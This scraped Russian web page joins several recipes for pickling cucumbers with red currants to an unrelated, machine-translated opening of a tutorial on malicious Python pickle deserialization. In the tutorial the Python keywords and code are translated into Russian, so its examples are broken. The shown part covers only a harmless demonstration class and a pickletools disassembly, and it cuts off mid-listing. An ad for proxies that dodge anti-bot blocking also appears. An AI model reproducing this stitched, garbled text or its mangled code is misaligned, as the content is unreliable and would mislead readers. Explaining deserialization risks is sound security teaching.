Огурцы с красной смородиной — 5 вкусных рецептов без уксуса
Для тех, кто всегда ищет новые рецепты заготовок в этом году я предлагаю закрыть огурцы на зиму с красной смородиной. Не правда ли, удивительный способ? Но когда в самый разгар холодов вы решите открыть баночку, то поверьте, будете очень удивлены, какими вкусными, ароматными и хрустящими получились овощи.
Заготовка огурцов на зиму с красной смородиной дело нехитрое. С ним вы точно справитесь, даже если до этого никогда ничего подобного не делали. Прелесть представленных рецептов в том, что в них мы не будем использовать уксус. В качестве консерванта у нас будут выступать красные ягодки.
Но помните, чтобы ничего не вздуюсь и не пропало, все ингредиенты следует промыть очень тщательно. А банки и крышки стерилизовать подольше, чтобы наверняка устранить все микробы и бактерии, которые могут на них находиться.
Огурцы с красной смородиной на зиму без уксуса на литровую банку
Огурцы, маринованные с веточками красной смородины на зиму, приготовленные по тому рецепту не только вкусные и хрустящие, но и очень красиво смотрятся в банке.
Что понадобится:
- Чеснок – 3 очищенных зубчика.
- Душистый перец – 3 горошинки.
- Половинка листа хрена.
- Листик вишни.
- Пара листиков смородины.
- Зонтик укропа.
- Несколько огурчиков на литровую банку.
- 10 веточек смородины.
- 1 столовая ложка соли.
- 2 столовые ложки сахара.
Указанное количество ингредиентов вполне хватит, чтобы солить огурцы в ягодах на банку, объёмом 1 литр. Если же вам больше по душе консервирование в больших банках, то увеличьте количество продуктов пропорционально объёму.
Как готовить
Огурчики лучше брать небольшого размера. Так они хорошо поместятся в банку. И нам не придётся ничего разрезать. Плоды моем и оставляем в воде на пару часов. Так они смогут напитаться водой, а значит будут более хрустящими. Но если огурчики с вашего огорода и только что собраны, этот этап можно смело пропускать.
Банки помыть и простерилизовать. То же самое сделать и с крышками. Удобнее всего их просто прокипятить минут 5. Зелень и специи промыть под проточной водой.
Маринование огурцов на зиму с красной смородиной требует довольно большого количества ягод. Лучше всего положить на 1 литр не меньше большой горсти. В противном случае заготовки не будут храниться.
На дно банки выкладываем хрен, четвёртую часть ягод, чеснок и душистый перец. Лист хрена брать лучше целым, а вот чеснок рекомендуется порезать на дольки.
У огурцов срезаем кончики с двух сторон и также выкладываем в банку. Лучше всего это делать стоя. В пустоты, которые при этом образуются, засыпаем смородину. Здесь как вам больше нравится – веточками или по одной. На самый верх укладываем вишнёвый лист и зонтик укропа. Можно ещё прикрыть и листом хрена – лишним он не окажется.
Теперь начинаем готовить рассол. Наливаем в кастрюлю воды чуть больше литра, выкладываем соль и сахар и ставим кипятить на плиту. После закипания оставляем на плите в кипящем состоянии на 5 минут.
Заливаем готовый рассол в баночки. Для этого можно использовать кружку или половник, а можно вливать и прямо с кастрюли.
Прикрываем банку крышкой, и отправляем стерилизоваться. В большую кастрюлю наливаем воду, на дно помещаем кухонное полотенце и ставим банки. Причём воду в кастрюлю следует сразу наливать горячую, чтобы от перепада температур стекло не лопнуло.
Время на стерилизацию отводится около 10 минут. После чего заготовку вынимаем и закатываем крышками. Переворачиваем дном вверх и ставим под одеяло или плед до полного остывания. Через сутки убираем на хранение. Пробовать консервированные огурцы на зиму с красной смородиной можно не раньше, чем через месяц. Так они хорошо промаринуются и впитают в себя весь аромат ягод и других приправ.
Самый вкусный рецепт приготовления огурцов с красной смородиной без стерилизации на 3 литра
Засолка огурцов на зиму по этому рецепту с красной смородиной – это прекрасный вариант закуски на все зимние месяцы. Ими можно хрустеть хоть каждый день, а можно подавать к картошке. Ну а на новогоднем столе они станут настоящим украшением. И отказаться от них не сможет ни один гость.
Что понадобится:
- Огурцы свежие – 600 – 800 г.
- Красная смородина, ягодками или веточками, — 200 г.
- Чеснок – 4 зубчика, но не обязательно, а по желанию.
- Пара зонтиков укропа.
- Лист хрена или кусочек его корня.
- Черная смородина – пара листиков.
- Пара листиков вишни.
- Вода – 3 литра.
- Соль – 3 большие ложки.
- Сахар – 3 большие ложки.
В любой консервации очень важна чистота, поэтому и ягоды, и зелень, а самое главное – банки и крышки следует хорошо вымыть. А огурцы следует обязательно оставить в воде на пару часов, чтобы они напитались жидкостью, и после того, как вы их достанете, были бы не только вкусными, но и максимально хрустящими.
Как готовить
В чистую и стерильную банку на самое дно выкладываем специи – чеснок, порезанный на дольки, половинка листа хрена или кусочек корня, длиной в пару сантиметров, по желанию – чёрный перец горошком.
После чего заполняем банки плодами, но так, чтобы между ними оставались пустоты. Это необходимо для ягод. Если зелёненькие плоды уложить слишком плотно, то места для смородины не останется. И заготовка просто закиснет.
Теперь пришло время рассола. Для этого в кастрюлю вливаем 3 литра воды, даём закипеть и переливаем в банки. Прикрываем крышками, оставляем на 10 минут, после чего сливаем в кастрюлю и снова даём закипеть.
Каждый раз после слива рассола банки следует прикрывать крышками.
Кипящую жидкость снова заливаем в банку, снова прикрываем крышками и во второй раз оставляем на 10 минут. А через это время опять сливаем. И ставим кипятиться.
Пока рассол будет кипеть, положим в него соль и сахар. А в банках разместим красную смородину. В этот раз она будет просто ягодками, без веточек.
После чего выливаем в банки рассол и сразу же закатываем железными крышками. После чего переворачиваем банки вверх дном и укрываем одеялом.
Консервированные огурцы с красной и чёрной смородиной на зиму
Листья и ягоды чётной и красной смородины всегда будут в выигрышном положении при заготовке огурцов. Соленья получаются вкусными и хрустящими, несмотря на то, что мы не будем добавлять уксус. А если использовать два видя ягод, то в банке получится настоящая красота.
Что понадобится:
- Огурцы – 5 – 7 штук.
- Красная смородина – 150 г.
- Чёрная смородина – 50 г.
- Укроп – пара зонтиков.
- Чеснок – 3 большие дольки.
- Листики смородины – 3 штуки.
- Лавровый лист – по желанию.
- Перец чёрный горошком – по желанию.
- 2 столовые ложки сахара.
- 2 столовые ложки соли.
Это количество продуктов рассчитано на банки, объёмом 1 литр. Если вы никогда прежде не заготавливали хрустящие огурцы на зиму с красной смородиной, то начните с этой маленькой баночки.
Как готовить
Огурцы, если они сорваны с вашей грядки только что, можно только помыть и использовать для маринования. Если же они покупные и выглядят не очень свежими, то обязательно замочите их в ледяной воде на пару часов. И уже после можно использовать в нашем рецепте.
Всё, что можно из листьев, а также смородину, следует промыть под проточной водой. Веточки можете удалить, а можете оставить – здесь по вашему желанию.
В стерильные банки укладываем на самое дно укроп и листья, а также измельчённый чеснок. Далее закладываем огурцы, а пространство между ними засыпаем слоями.
Помните, что большое количество укропа и всевозможных листиков может вызвать закисление. Поэтому используйте такое количество зелени, что указано в рецепте.
Овощи для каждой банки подберите небольшие, одного размера, для равномерной просолки. Наполнив банки до верху, поместите вверх лист смородины. Вскипятите воду и залейте банки до верху. Слейте через минуту в раковину. Таким образом мы проводим бланшировку овощей.
Затем вскипятите новую порцию чистой воды и залейте банки, на этот раз оставьте до полного остывания. Затем используя крышку с отверстиями слейте воду, но уже в кастрюлю.
В кастрюлю со слитой водой кладем соль и сахар, отмеряя пропорции на 1 литр, у вас получится в зависимости от количества баночек. Затем кипятим 3 минуты с момента закипания, проверьте, чтобы растворились сухие продукты.
Заливаем горячим рассолом банки до самого верха. И закатываем стерильными крышками.
Банки переверните верх дном, укутайте и оставьте до полного остывания. Такая баня пойдет им на пользу. Так как будет медленное остывание. Храните их в прохладном месте, так как аскорбиновая кислота гораздо слабее уксуса.
Рецепт огурцов на зиму с красной смородиной с пошаговыми фото
Если вам больше по душе заготовки в баночках, рассчитанные на полтора литра, то этот рецепт огурцов с кисленькими ягодами на зиму создан специально для вас. Такой баночки как раз хватит, чтобы покушать один раз и после вскрытия не хранить в холодильнике.
Что понадобится:
- Огурцы – 2 кг, но следует брать небольшого размера, самые молодые.
- Смородина красная без веточек – 250 г.
- 50 грамм соли.
- 100 г сахара.
Как видите, здесь нет никаких дополнительных приправ. Но при желании вы всегда сможете ввести стандартный набор – чеснок, перец чёрный молотый, лаврушку, укроп и хрен.
Как готовить
Огурцы хорошо вымыть, обрезать хвостики. Ягоды перебрать, промыть. Банки помыть и использовать только стерильными.
В ёмкость, объёмом полтора литра выкладывать огурцы, причём делать это в вперемешку со смородиной.
Когда всё будет уложено, начинаем готовить маринад. В кастрюлю с водой, которая у нас уже кипит, засыпаем сахар и соль. Залить банки и прикрыть крышками.
Теперь наступает самый важный этап – стерилизация. На дно большой кастрюли стелем полотенце, вливаем горячую воду, выставляем банки и включаем огонь. После закипания ждём 5 минут и закатываем.
Во время стерилизации важно следить, чтобы банки не соприкасались друг с другом. Да и ставить их в кастрюлю с холодной водой не следует – стекло может лопнуть.
Благодаря соку красной смородины огурцы приобретут красивый розовый цвет, будут хрустящими и очень нежными на вкус. Но хранить заготовку лучше всего в холодильнике.
Огурцы и помидоры с красной смородиной на зиму – вкусное ассорти
Если вам больше нравится засол огурцов не только с красной смородиной, но и с помидорами на зиму, обязательно попробуйте этот удивительно вкусный, и в то же время простой в приготовлении рецепт.
Что понадобится:
- Огурцы – сколько войдёт в банку.
- Помидоры – сколько войдёт в банку.
- Зелень, например, свежий базилик, мята, листики хрена и укроп.
- Специи на свой вкус(чёрный перец горошком).
- 2 столовые ложки соли.
- 3 столовые ложки сахара.
Банки для засолки лучше всего брать небольшого объёма – на один раз. Так консервация будет происходить быстрее, а самое главное – огурцы и помидоры не будут мешать друг другу.
Как готовить
В чистые и вымытые ёмкости помещаем специи, укладываем вымытые овощи небольшого размера. Томаты нужно наколоть зубочисткой в месте прикрепления плодоножки. Сделайте 3-4 прокола.
Укладывая овощи, пересыпайте их слоями со смородиной.
Наполняем овощами до верху. При желании, смородину можете заменить брусникой.
Вскипятите воду, залейте до верху и прикройте стерильными крышками. Пусть стоят 20 минут. Затем слейте воду, не выливая ее. Слейте через крышку с отверстиями.
Это будущий маринад, добавьте в него соль и сахар, и прокипятите помешивая пару минут. Залейте ёмкости маринадом. Закручиваем стерильными крышками и проверяем на герметичность.
Переворачивать ничего не нужно, лишь укутайте, и таким образом пусть постепенно остывают. Все очень просто, потом уберете на хранение.
Консервация огурцов по этому рецепту может проходить как с процессом стерилизации, так и без него. При этом сами овощи всегда будут вкусными и очень хрустящими, с едва заметной кислинкой. Такие помните, что соль следует брать самую обыкновенную. А вот от йодированной лучше отказаться – из-за её использования заготовки на зиму могут помутнеть.
рецепт с фото, секреты приготовления
пошаговый рецепт с фотоМаринованные огурцы со смородиной — необычный и яркий «плодово-ягодный» дуэт. Простой рецепт позволяет надежно его сохранить. Не следует злоупотреблять укропом и класть чеснок. Смородиновые листья и ягоды вместе с плодоножками придадут маринаду терпкость и характерный аромат.
Для того чтобы огурчики оставались плотными и хрустящими, их нужно предварительно ненадолго замочить в холодной воде.
Веточки маринованных ягод — прекрасная пикантная закуска, украшающая любой стол, и отличное пряное дополнение к мясным блюдам. Однократная заливка сохраняет основное количество витаминов.
Ингредиенты
Вам потребуется на 1 л банку:
- 6-7 молоденьких огурцов
- 150 г красной смородины
- 1-2 листа хрена
- 5-6 горошин душистого перца
- 3 сухих гвоздики
- 1 ст. л. соли без верха
- 1 ч. л. сахарного песка
- 15 мл 9% уксуса
- 250 мл воды
- 2-3 зонта укропа
Приготовление
1. Банку промоем в воде и выложим на ее дно промытый лист хрена – его сок позволит огурчикам остаться хрустящими. Огурцы также промоем в воде, но не будет отрезать у них хвостики – целыми всунем в емкость, стараясь заполнить ее по кругу, а в верху оставить место для ягод. Старайтесь приобретенные или сорванные овощи сразу же закатывать, иначе они становятся вялыми и могут затем начать бродить в консервации.
2. Дополним до верха банку ягодами красной смородины, промытыми, но не очищенными от хвостиков.
3. Закипятим воду и кипящей зальем в банку. Накроем крышкой для консервации и оставим на 10 минут «отдыхать».
4. Затем сольем воду обратно в сотейник, сняв жестяную крышку и накрыв банку крышкой с отверстиями.
5. Добавим в воду укропные зонтики, горошины душистого перца, соль, сахарный песок, гвоздику. Еще раз вскипятим, выключим огонь и зальем 9% уксус. Уксус вливают в не кипящую воду, иначе вам не избежать огромной выделяющейся пены.
6. Зальем приготовленным маринадом второй раз нашу заготовку и сразу же укупорим крышкой.
7. Закатаем ключом для консервации и перевернем верх дном, проверяя плотность укупорки. Перенесем банку на хранение.
Доставать маринованные огурцы с красной смородиной будем на торжественное мероприятие или просто так, чтобы полакомиться ими от души!
Хозяйке на заметку
1. Место примыкания хвостика к огуречной шкурке нужно осторожно потереть уголком кухонной губки, а ее мягкой стороной следует пройтись по пупырчатой поверхности овоща. Во всех этих местах могут притаиться прилипшие загрязнения, которые, если их не удалить, будут провоцировать вздутие крышки.2. Столь же тщательно придется промыть смородину, но уже другим способом: гроздья погружают в прохладную воду, отмачивают минут 20, потом аккуратно перебирают и теребят пальцами, затем откидывают на дуршлаг. Цель этой манипуляции – избавить веточки и ягоды от засохшей грязи и насекомых.
3. Выбрасывать смородину, намереваясь выложить на тарелку огурцы, не стоит. Она послужит оригинальным декором, если намеренно небрежно разбросать ее по ободку. А может быть, кто-то распробует необычный деликатес и признает маринованную ягоду удачной закуской к крепкому алкоголю. Кстати, в стародавние времена эта роль отводилась моченым и слегка подсоленным плодам. На заметку: витамин С при заливке маринадом сохраняется в любых садово-огородных культурах хоть и не полностью, но в значительном количестве.
4. Смородиновые листочки совсем не помешают в подобной зимней заготовке: вместе с хреном они поспособствуют тому, чтобы огурчики хрустели даже после годичного пребывания в рассоле. Кроме того, можно добавить дубовые.
КомментироватьNo votes yet.
Please wait. ..
Изобретение нового блюда делает больше для человеческого счастья, чем открытие новой звезды.
Смотрите ещё: Соленья и маринады
Как солить огурцы на зиму — с красной смородиной и без
Как солить огурцы на зиму. Два хороших, проверенных рецепта консервирования огурцов с уксусом и без уксуса.
Друзья, если у вас есть рецепт засолки огурцов, которым вы хотите поделится — будем очень рады увидеть ваш рецепт в комментариях к этой записи!
Говорят, Наполеон обещал награду, аналогичную по сумме современным 250 тысячам долларов тому, кто отыщет способ сохранять огурцы свежими. Любил он в походах перекусить хрустким огурчиком. Премию до сих пор никто не получил, а вот солить огурцы так, чтоб не хуже свежих хрустели, мы и француза научим. Предлагаем вам популярные рецепты быстрой и не слишком хлопотной засолки огурцов, а также перечень типичных ошибок при консервировании.
Консервирование огурцов методом трехкратной заливки
Самый простой способ, без пастеризации с последующим выуживанием банок из кипятка. Банки прожариваем в духовке или над паром (рисковые хозяйки просто моют банки с содой, и консервы благополучно хранятся), кладем на дно по три листочка смородины и вишни, чеснок, стружки хрена и 10-15 горошин перца. Благодаря хрену закуска обретет пикантный «русский» аромат. Укладываем огурцы, закрываем веточкой зрелого укропа. Кипятим воду, заливаем и сразу сливаем обратно в кастрюлю. Так мы узнаем точный объем рассола. Вновь кипятим, добавив ст. ложку соли с горкой и сахара без горки из расчета на трехлитровый баллон. Заливаем, оставляем до остывания (часа четыре). Если огурчики маленькие, достаточно получасовой выдержки. Сливаем рассол, кипятим, заливаем в третий раз. Под крышку добавляем неполную ст. ложку уксуса (70%)и закручиваем. Совет: чтобы маринад приобрел приятный чайный цвет, вскипятите в воде для заливки горсть смородинных листьев.
Огурцы с красной смородиной.
Рецепт посложнее, но вкус огурцов превосходен. Заготовка хороша тем, что готовится без уксуса. Красная смородина – сама по себе отличный консервант. Закладываем в полуторалитровые банки огурцы, пересыпая ягодами (400 г на три литра), специи. Бланшируем, заливаем горячим маринадом (ст.л. соли и пол-ложки сахара) и пастеризуем 8 минут. Готово, закручиваем. Такие огурцы не потеряют в цвете и качестве, но вот хранятся не так долго, как «уксусные».
Засолим огурцы со смородиной!
Красное на зеленом фоне. И вкусно, и красиво, и без уксуса.
Несколько правил грамотного консервирования.
1. Собирайте огурцы рано утром, когда они еще бодры и свежи. Собранные в другое время плоды замочите на несколько часов, чтобы вернуть влагу.
1. Огурцы не трамбуйте в банку – взорвутся.
1. Соль должна быть крупная, обычная. Уксус – без добавок.
2. Избыток укропа может спровоцировать «взрыв».
3. При пастеризации температура воды не должна превышать 90 градусов.
4. Чтобы огурцы не «сварились» при заливке кипятком, кладите сверху самый крупный экземпляр – он примет первый температурный удар на себя.
5. Сделайте заливку на основе отвара листьев смородины, это улучшит букет.
Огурцы с красной смородиной проверенный рецепт
Огурцы с красной смородиной проверенный рецептhttps://recepty-s-foto.ru
Ингредиенты
2 кг. огурцы
100 г. смородина красная
20 г. укроп
2 шт. листья вишни
2 зубчика. чеснок
1 шт. лист лавровый
3 г. перец черный
30 г. сахар
20 г. соль
1 л. вода
Способ приготовления
ПоделитьсяВремя хрустеть. Огурцы с красной смородиной выглядят эффектно и съедаются с аппетитом. В соленье вся польза природы из натуральных компонентов. Листья вишни и веточки укропа придают особый аромат, чеснок, лавровый лист и горошины перца – пикантность. Отличное угощение для праздников и будней. Маринованные ягоды тоже можно есть.
Особенности приготовления огурцов с красной смородиной
- Овощи выбираем небольшие, аккуратные, без повреждений. При желании перед закладкой отрезаем хвостики.
- Смородину отрываем от веточек или используем гроздями. На вкус выбор не повлияет.
- Кроме вишневых листьев можно взять смородиновые и листочек хрена – это базовый набор зелени для маринования огурчиков.
- Количество чеснока и перца регулируем по своим вкусам. Можно увеличить или уменьшить их вес в составе соленья.
Благодаря кислым ягодам укусу не используется, однако на качество хранения такая замена не влияет.
Проверенный рецепт огурцов с красной смородиной с фото пошагово
(Visited 72 times, 1 visits today)
Шаги
Если огурчики сорваны давно, их можно реанимировать. Для этого моем овощи и кладем в таз с холодной водой на пару часов. После такой ванны плоды выйдут крепкими и упругими. | |
Смородину перебираем, чтобы удалить мусор и подгнившие ягодки. Отрываем от веточек, моем, кладем в дуршлаг, чтобы стекла вода. | |
Чеснок очищаем и режем небольшими кусочками. Листочки тщательно вымываем, укроп ополаскиваем. Зелень раскладываем на бумажном полотенце, чтобы просохла. | |
Банки готовим привычным способом: стерилизуем на плите, в микроволновой печи или в духовке. Затем кладем укроп и вишневые листочки на дно. Туда же отправляем лавровый лист и горошек. | |
Часть смородины также сыплем на дно баночки. | |
Укладываем подготовленные огурцы. Заранее отрезаем кончики. Плоды помещаем вплотную один к другому. | |
Высыпаем оставшуюся смородину. Если есть место, кладем еще один огурец. | |
Варим маринад. В кастрюлю наливаем воду, добавляем сахар и соль, доводим до кипения. Кипятим 5 минут. | |
Кипящим маринадом заливаем содержимое банки. | |
На дно большой кастрюли кладем сложенное вчетверо полотенце. Ставим банку и накрываем ее крышкой, которую прокипятили в течение пяти минут. Ставим конструкцию на огонь, заливаем теплой водой по плечики банки, включаем нагрев. Дожидаемся, пока вода закипит. Отсчитываем 10 минут. | |
Готовую консервацию извлекаем из кастрюли. Закрываем при помощи специального ключа. Если крышка винтовая, то просто ее закручиваем. | |
Переворачиваем банку и накрываем теплым полотенцем или пледом. | |
Спустя время огурцы с красной смородиной отправляем в темное прохладное место на хранение. | |
Зимой будет вкусно. Хрустящие огурчики с маринованными ягодками на время вернут летние деньки. Отличная закуска или дополнение к мясу. |
предыдущий
Сэндвичи из кабачковдалее
Творожно яблочный пирогпредыдущий
Сэндвичи из кабачковдалее
Творожно яблочный пирогЭтот сайт использует cookie для хранения данных. Продолжая использовать сайт, Вы даете свое согласие на работу с этими файлами. OK
Маринованные огурцы с красной смородиной, рецепт на зиму
Мы подобрали видео специально для Вас
Обожаю заниматься консервированием, как говорила моя бабушка, в каждую баночку мы кладём кусочек летнего солнышка, которое будет так радовать нас зимой. Особенно я люблю закрывать маринованные огурцы с красной смородиной, рецепт на зиму предлагаю и вам. У меня масса рецептов как соленых, так и маринованных закусок, и я стараюсь ежегодно консервировать одновременно разные заготовки, чтобы зимой у меня был выбор. Очень удачным вариантом я считаю огурчики, маринованные с красной смородиной и специями, – невероятно вкусно, ароматно и пикантно.Готовить такую консервацию несложно: если вы знакомы с технологией двукратной заливки, то без труда справитесь с этой задачей. Баночки после заливки я подвергаю стерилизации и только после этого закрываю их крышками.
Рецептура рассчитана на 2 баночки вместимостью 1 л. каждая.
Ингредиенты:
— огурец (засолочных сортов, небольшой) – 1 кг,
— ягода смородины (красная) – 150 г,
— вода – 1 л,
— сахар-песок – 6 ч.л. (по 3 ч.л. на баночку),
— соль поваренная крупного помола – 3 ч.л. (по 1,5 ч.л. на баночку),
— уксус столовый (9%) – 2 ст.л. (по 1 ст.л. на баночку),
— чеснок – 8 долек (по 4 дольки в каждую баночку),
— укроп– 2 – 3 веточки,
— плод перца горошком – 8шт. (по 4 шт. на баночку),
— кориандр (семя) – 10 шт. (по 5 шт. на баночку).
Прежде всего, промываем отобранные огурчики холодной водой. Обрезаем кончики с обеих сторон и замачиваем в воде на пару часов (если огурцы прямо с грядки, то этого можно не делать).
Вымываем баночки с содой горячей водой (можно не стерилизовать).
На дно каждой кладём семена кориандра и плоды перца, а также почищенные и порезанные пополам дольки чеснока. Затем кладём веточки укропа и ягоды смородины.
Выкладываем в баночки подготовленные огурчики довольно плотно.
И вливаем кипящую воду.
Затем, через 15-20 минут сливаем воду в сотейник и кипятим её пару минут.
За это время в каждую баночку добавляем сахар и соль, а также вливаем уксус.
Как только заливаем банки снова водой, ставим их для стерилизации на водяной бане.
Процесс стерилизации длится примерно 15-20 минут с момента, как закипит вода в кастрюле.
После этого сразу же закрываем банки крышками (хорошо для этого взять еврокрышки) и укутываем консервацию, как обычно.
Приятного аппетита!
опасных солений — сериализация вредоносного Python
Эти соленья — очень опасные соленья. Я буквально не могу сказать вам, насколько они опасны. Вы должны мне поверить в этом. Это важно, хорошо?
— «Взрывное расстройство», Пан Теларе
Прежде чем мы углубимся в опкоды, давайте рассмотрим небольшую предысторию. В стандартной библиотеке Python есть модуль pickle, который используется для сериализации и десериализации объектов.За исключением того, что это не называется сериализацией и десериализацией, это травление и распаковка .
Как человек, который до сих пор страдает от случайных кошмаров об использовании Boost Serialization в C ++, я должен сказать, что травление — это очень здорово.
Независимо от того, что вы в него бросаете, он почти всегда Just Works ™. И не только со встроенными типами — в большинстве случаев вы можете сериализовать свои собственные классы без необходимости писать какие-либо методы сериализации picklization .Даже такие «ошибочные» объекты, как рекурсивные структуры данных, которые могут вызвать сбой при использовании аналогичного модуля маршалинга, обрабатываются без проблем.
В качестве быстрого примера для тех, кто еще не знаком с модулем pickle,
импортный рассол
# начать с любого экземпляра типа Python
original = {'a': 0, 'b': [1, 2, 3]}
# превращаем его в строку
маринованный = pickle.dumps (оригинал)
# превратить его обратно в идентичный объект
идентичный = рассол. загрузки (маринованные)
— это все, что вам нужно в большинстве случаев.Это действительно здорово… но под поверхностью таится тьма.
Одна из первых строк документации модуля pickle
гласит:
Предупреждение: Модуль
pickle
не защищен от ошибочных или злонамеренно созданных данных. Никогда не извлекайте данные, полученные из ненадежных или неподтвержденных источников.
Я читал это предупреждение бесчисленное количество раз и часто задавался вопросом, как именно будут выглядеть такие злонамеренно созданные данные.Недавно я решил, что пора наконец выяснить. Я действительно рада, что сделала.
Мои поиски злонамеренного построения некоторых данных привели меня к тому, что я многое узнал о том, как работает протокол травления, обнаружил несколько действительно интересных методов отладки pickle и обнаружил несколько довольно дерзких комментариев в исходном коде Python. Если вы останетесь со мной в этом вопросе, вы, надеюсь, разделите те же преимущества (и в кратчайшие сроки отправите людям свои собственные вредоносные файлы рассола). Справедливое предупреждение: это будет немного техническим … единственное реальное предварительное условие — это немного знать Python, но некоторое базовое знакомство со сборкой не повредит.
Я начал с чтения документации модуля pickle
, надеясь найти хоть какие-то намеки на то, чтобы стать элитным хакером, когда мне сразу же выскочила одна строчка:
Модуль
pickletools
содержит инструменты для анализа потоков данных, генерируемых pickle.pickletools Исходный код
содержит подробные комментарии о кодах операций, используемых протоколами pickle.
Коды операций? Я не ожидал, что реализация pickle будет
дампов def (obj):
вернуть объект.__repr __ ()
деф нагрузки (маринованные):
# Предупреждение: модуль `pickle` небезопасен ...
вернуть eval (маринованный)
, но я также не ожидал, что он определит собственный машинный язык низкого уровня. К счастью, остальные части этой строки очень верны: модуль pickletools невероятно помогает понять, как работает протокол. К тому же его комментарии к коду могут быть довольно забавными.
Возьмем, к примеру, вопрос, на какой версии протокола нам следует сосредоточиться.
Всего в Python 3 их пять.6, пронумерованные от 0 до 4.
Хорошо, протокол 0 — это своего рода очевидный выбор, потому что в документации он описан как «читаемый человеком», но исходный код pickletools
предлагает некоторые дополнительные сведения:
Коды операций Pickle никогда не исчезнут, даже когда будут изобретены лучшие способы сделать что-то. Репертуар PM со временем только растет … «Раздутие кода операции» — это не столько тонкость, сколько источник утомительных осложнений.
Оказывается, каждый новый протокол является надмножеством предыдущего, так что даже помимо того, что протокол 0 «читается человеком» — что на самом деле не имеет большого значения, если мы все равно декомпилируем в инструкции — он также имеет наименьший количество допустимых кодов операций.Это звучит идеально, если цель состоит в том, чтобы узнать достаточно, чтобы понять, как могут формироваться вредоносные файлы pickle.
Если вы сейчас запутались во всей этой штуке с кодами операций, не волнуйтесь. Сейчас мы вернем это к Python, а затем я объясню это подробно с точки зрения того, как коды операций приравниваются к коду Python чуть позже. Давайте создадим красивый простой класс Python, коды операций не требуются.
класс Бомба:
def __init __ (я, имя):
self.name = имя
def __getstate __ (сам):
вернуть себя. название
def __setstate __ (себя, состояние):
self.name = состояние
print (f'Bang! From, {self.name}. ')
bomb = Бомба ('Эван')
Методы __setstate __ ()
и __getstate __ ()
используются модулем pickle
для сериализации и десериализации классов.
Часто вам не нужно определять их самостоятельно, потому что реализации по умолчанию просто сериализуют __dict__
экземпляра.
Как вы можете видеть, я определил их здесь явно, чтобы я мог скрыть небольшой сюрприз , когда объект Bomb
десериализуется.
Давайте попробуем и посмотрим, работает ли наш код-сюрприз для десериализации. Мы будем мариновать и распаковывать объект с помощью
импортный рассол
pickled_bomb = pickle.dumps (бомба, протокол = 0)
unpickled_bomb = pickle.loads (маринованная_bomb)
, который выводит
Взрыв! От Эвана.
точно по плану!
Есть только одна проблема: если мы попытаемся десериализовать эту строку pickled_bomb
в контексте, где Bomb
не определено, то это не сработает. Вместо этого мы получим следующую ошибку.
AttributeError: не удается получить атрибут 'Bomb' в
Оказывается, мы можем запустить наш собственный метод __setstate __ ()
только в том случае, если контекст выделения уже имеет доступ к коду с нашим вредоносным оператором print
.
Если у нас есть контроль над кодом, который наша жертва уже запускает, то зачем вообще возиться с этим рассолом?
Мы могли бы просто записать наш вредоносный код в любой другой метод, который они могли бы использовать, и все готово.Совершенно верно, я просто хотел показать это прямо.
В конце концов, есть основания подозревать, что Python может поддерживать байтовый код травления для метода десериализации объекта.
Модуль marshal
может, например, сериализовать методы, и многие сторонние альтернативы рассолу, такие как зефир, укроп и пирог, также поддерживают сериализацию функций.
Однако это зловещее предупреждение в документации pickle
вовсе не об этом. Нам нужно будет копнуть немного глубже, чтобы понять, каковы настоящие опасности десериализации.
Интоли смарт-прокси
Если вы серьезно занимаетесь парсингом веб-страниц, использование прокси-серверов просто необходимо. Наша служба Intoli Smart Proxies позволяет легко избавиться от блокировки службами защиты от ботов. Ваши запросы разумно маршрутизируются через чистые внутренние IP-адреса, где они, вероятно, будут успешными, неудавшиеся запросы автоматически повторяются, и вы даже можете делать запросы через удаленные браузеры, предварительно загруженные с настройками, которые затрудняют обнаружение вашего парсера.Введите ниже свой адрес электронной почты, чтобы получить доступ к тем же инструментам, которые мы используем для всего нашего собственного веб-скрапинга!
Пришло время попытаться понять, как на самом деле работает травление.
Давайте начнем с рассмотрения нашего объекта pickled_bomb
из предыдущего раздела.
b'ccopy_reg \ n_reconstructor \ np0 \ n (c__main __ \ nBomb \ np1 \ nc__builtin __ \ nobject \ np2 \ nNtp3 \ nRp4 \ nVEvan \ np5 \ nb. '
Подождите … мы использовали протокол 0, верно? Если это «читабельно», назовите меня Флойд Мэйвезер-младший.
Ничего страшного, исходный код pickletools
должен содержать «подробные комментарии о кодах операций, используемых протоколами pickle».
Наверняка поиск там поможет нам разобраться!
Я отчаялся документировать это точно и понятно — вам действительно нужно прочитать код pickle, чтобы найти все особые случаи.
— Комментарий в исходном коде
pickletools
О, Боже. Во что мы влезли?
Шутки в сторону, исходный код pickletools
на самом деле очень хорошо прокомментирован.Сами инструменты тоже чертовски полезны.
Например, они включают метод разборки рассола под названием pickletools. dis ()
.
Это поможет нам превратить наш рассол в нечто более понятное.
Чтобы разобрать нашу строку pickled_bomb
, нам просто нужно запустить
импортные инструменты для соления
pickletools.dis (pickled_bomb)
, что выведет
0: c ГЛОБАЛЬНЫЙ 'copy_reg _reconstructor'
25: p PUT 0
28: (ОТМЕТЬ
29: c ГЛОБАЛЬНАЯ '__main__ Bomb'
44: p PUT 1
47: c ГЛОБАЛЬНЫЙ '__builtin__ object'
67: p PUT 2
70: N НЕТ
71: t ТРАП (ОТМЕТЬТЕ на 28)
72: p PUT 3
75: R УМЕНЬШИТЬ
76: p PUT 4
79: V UNICODE "Эван"
85: p PUT 5
88: b СТРОИТЬ
89:.СТОП
самый высокий протокол среди кодов операций = 0
Это должно показаться довольно знакомым, если вы когда-либо имели дело с какими-либо языками ассемблера (, например, x86, Dalvik, CLR).
Ничего страшного, если вы еще не сделали этого, мы рассмотрим это шаг за шагом.
А пока просто знайте, что слова с заглавной буквы, такие как GLOBAL
, PUT
и MARK
, представляют собой коды операций или инструкции, которые интерпретируются аналогично функциям в языках более высокого уровня. Материал справа от них подобен аргументам этих функций, а материал слева просто относится к тому, как они были закодированы в исходной «читаемой человеком» строке.
Прежде чем мы проделаем все это пошагово, давайте представим еще одну действительно полезную утилиту, предоставляемую pickletools: pickletools.optimize ()
.
Этот метод удаляет неиспользуемые коды операций из pickle, поэтому он будет производить более простой — но в остальном эквивалентный — pickle.
Мы можем разобрать оптимизированную версию pickled_bomb
, запустив
pickled_bomb = pickletools.optimize (маринованная_bomb)
pickletools.dis (pickled_bomb)
, который производит более короткую и приятную последовательность инструкций.
0: c ГЛОБАЛЬНЫЙ 'copy_reg _reconstructor'
25: (ОТМЕТКА
26: c ГЛОБАЛЬНЫЙ '__main__ Bomb'
41: c ГЛОБАЛЬНЫЙ '__builtin__ object'
61: N НЕТ
62: t ТРАП (ОТМЕТЬТЕ на 25)
63: П УМЕНЬШИТЬ
64: V UNICODE "Эван"
